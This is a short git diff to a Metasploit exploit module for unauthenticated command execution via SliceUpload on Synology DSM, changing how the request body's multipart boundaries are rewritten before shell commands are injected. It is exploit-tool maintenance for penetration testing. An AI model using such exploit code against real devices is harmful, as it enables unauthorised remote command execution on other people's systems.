diff --git a/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb index 980c6a1fdf..53c1c4152b 100644 --- a/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb +++ b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb @@ -121,7 +121,7 @@ class Metasploit3 < Msf::Exploit::Remote post_body.sub!(cmd_placeholder, cmds) # fix multipart encoding - post_body.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part") + post_body.gsub!(/\r\n(--#{mime_msg.bound})/, ' \\1') # send request to append shell commands print_status("#{peer} - Injecting the payload...")